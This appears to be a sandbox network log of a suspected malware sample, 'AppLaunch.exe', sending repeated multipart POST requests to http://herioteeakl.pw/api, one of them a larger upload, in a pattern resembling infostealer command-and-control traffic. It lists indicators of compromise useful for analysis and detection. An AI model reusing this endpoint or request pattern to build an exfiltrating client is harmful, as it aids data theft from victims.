Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Sskw2Qv5hR7OkG9%2F0tgoR2YMC2Ppl62O%2FHuMy3JpDOgaXyPOlknrYTly58mQPFactC%2F71XPBg3iemYwe8aogSn%2F%2FpzGpL8McNZTLJn0KajMAtzbAzDy2xFPklgjFYg0XRw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b52352c6eb8be-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=17ebpsa79f7r7u1spcif9dbjtg; expires=Fri, 08 Mar 2024 18:47:43 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:04 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ogyhWg2UvuiegLXGk8okjiDHkJwTV2kqTiA0D0tL2ISWPNayy3FL7etzZ59pMOLRfkRzlbs5V4AFYR6NA6rS4a%2Fjb%2Fs5G1hmEVe2Rvi95pdVlz95%2BIYCS2%2Fmp1lLmhmfbw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b523658fe1c80-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=s32h048vkhpno5prja31e6gof1; expires=Fri, 08 Mar 2024 18:47:43 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:04 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rxqNDveAuxBPUYeuxlwosc0VaMdUfx9rcHCVmUxGrE%2FOT9LiWaWGMMysFsquSPpdrWunJzfiDg67jgJm%2BdQ12PUhVHwgHQ6vW6G%2B%2BeVKktYOVuSH9zDrYad5JX%2FGgwUfMg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b52376c67b8a6-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=h0095asqnstgni44inuv45r8uu; expires=Fri, 08 Mar 2024 18:47:43 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:04 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sWh4dvIYvDdpLBCaiDrwEKkzjqcWqn1zsrbHm7uj%2BzZUNDx8l8VUz%2FFb1FRwlzeXoG2MPRj5ZgqvPSo3GFmD5KaRwJzhGunOn%2FYcllMt6PWKUj%2B5W60%2FsxHecCLAQLPpJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b52388edf66d8-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=n26j6nm9g3k9pgmpc8mqsc33p1; expires=Fri, 08 Mar 2024 18:47:44 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:05 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BdmFKr4zKT3Nmf850Wx1NHCLaLG7LWT6Ix6%2FBYqT28SL5Cbon6RbSKCV6q04C%2B%2BoerU4%2B4XPSQwbMG97hq6YI0qLMbBOqyat%2BqCw90W7k5MZdN2JPvCnT7E%2BHWZZD6%2BV8g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b5239ad4166c4-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=2qetrbnrpoda5onu3j8gs08c90; expires=Fri, 08 Mar 2024 18:47:44 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:05 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MbIk6CvYVBiGr4a3B%2BTyeP06qN3YfXrGeHQzbvu7YzGKqvP2QLivF7FoN57rulZydXiAoVtE%2FOBkTfynaSKy0LJc2qoHI5DgxV73uWpeG0XT8KciDMR8iqIzhB8dT5FpZw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b523b19ce6714-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 16329
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=760p8er8kmqep131h1b3m4kebj; expires=Fri, 08 Mar 2024 18:47:44 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:05 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H6%2FvfHJcfqGfiOs8vzeH0YeCw4REjRbXyPuBuHRwDNVgjIHSTPcM0kZiclVly62cY3BBh8AuyWJRCsShWGeCnQ4BMfGrKSPI135Dr933cQpXf%2BwOzmU56rPd3qI%2FuqYq4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b523dbda76568-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=9p3v4lmcape4cq0588pu2tprvv; expires=Fri, 08 Mar 2024 18:47:44 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:05 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2oR02uIZPyYBtLKohk6mXUZg5zz6IfdIqsgAHi3HERPRvH5kXi9e2wVxYqCy04%2BB48GjCiT%2FJ9FeACGE3dIT495SXY4GGjCSZhGGaUbXW%2FJMreqT%2BDU9l55xCrV%2BYDU31w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b523fca1266f3-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=mgfp053i7647q4jqtg3i5jvltv; expires=Fri, 08 Mar 2024 18:47:45 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:06 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FqX3Aa6JCGl%2Bv43syM6fgHiOhqjryEKgJxF68N5Vc9OuYfSgY0OtNf8LUx8dmIKluW%2FpFrUTkJgcDZijgcvczu6FZXUrggg%2Fl196dxxhVipSoWANN2DuelfUnSHSx2j1Jw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b5240cfe3b90f-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=bljif69tbletgtpenv1unnjj73; expires=Fri, 08 Mar 2024 18:47:45 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:06 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0Nhdj4Hc8ttm1TjCsxQPAco6gJDy1072CGGSyAbLyoAJLynvzjewQJPs7D4pq3%2FB7PtmMZSGv1oO9Vllu3ks2fWw6SCFfVM4o23InFwnPuPIrNAjGjN1w945ZyNDLMgpdg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b5242eda506c8-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=o82tlq2s70iqsr4meak6il47oo; expires=Fri, 08 Mar 2024 18:47:45 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:06 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=i3qqHkYJlxFFOXfe9xuYta0IsKLQhSDr9RhVEAteBWBimfOvcC5Crr%2BvG7kxv1A6e1f6eEiwfDLXiKajb4%2FSLmT1xzpHgWRMU0BHndRe5j74wYAvFJP%2Bn54NYm9TxbVydQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b52440d55b918-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=bbmppa6920enl5crhg0qob7mdp; expires=Fri, 08 Mar 2024 18:47:45 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:06 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AlD6zZdr4LBoUVUD%2ByQDSDgdwDQNN09Lu40Em8Xw9%2FHA8GpRPsGZX%2BZP3tNiEuA7hKpH6mugRNekywi%2BPIJKDSWVftJU90Gv0WZkU%2FWhOR9h3OyLoZiqSAdT3BHSBDrYGA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b52450ee10df6-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=nn6o7ergmmoer9rosq2qhedphs; expires=Fri, 08 Mar 2024 18:47:45 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:06 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SASvGe9qaDxAL%2Bi%2BfSz15QpaBNd82ekCQnD0J%2Fs%2Bun2C4u4lcdAdofQryXQwaum8s%2FCyn0K4%2BFTcAFk6DFod2tEuMdcG4UJERI6pYsmyf%2BUqXUmjCbVQUSK8Up7mSK%2F7zQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b52460d2a0b04-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=ni5m08npi478l42rivsi6nnpb4; expires=Fri, 08 Mar 2024 18:47:46 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:07 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BxbXpHJ49vSHhpLrOOXGAzG1huqqycz%2FLRXMMq8pSrCV%2FoTxf42DV%2B%2Fs7VyEQM969xrsMjRVGQA1gqrKlzkD8%2B4kasRJ5czOD2ZIq8gDic1fdLJM6cS6PxJdSoiIRKyYXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b52470c20b936-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=h15vt3fpk5h8otparqlj9v0e30; expires=Fri, 08 Mar 2024 18:47:46 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:07 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dgCJV%2BMrMGjiW%2BJDlWbJvYh7Vra3sQf4o7z2YhWYHEXk6S1uCFlezGbrqy%2BGfc2LeDIuc8wHt%2Fw0F3JvZOsNtFhCMc6dQZOHqqRyIKW1zY2414ZyB0kV4ezw9TNzYd28OA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b5248294d66f7-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=fj41ph209fbq80j817q4cjffg0; expires=Fri, 08 Mar 2024 18:47:46 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:07 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lJc0SJBOXyG2%2F89aXEkxhFg%2BsEqdwxzZbhV%2BUqrFhgjwF8bqLsErvL2os%2FLJ4EzwkqEnuEV%2B2q4R2K7S76iAV%2FObSfmt7jTadwUwumeum8JFf7QCft8Yf%2Byo0xD5uxnc3g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b5249287166ec-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 01:01:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=mjhf4f78gjan1bs8a4bn9ihc8l; expires=Fri, 08 Mar 2024 18:47:46 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 01:01:07 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
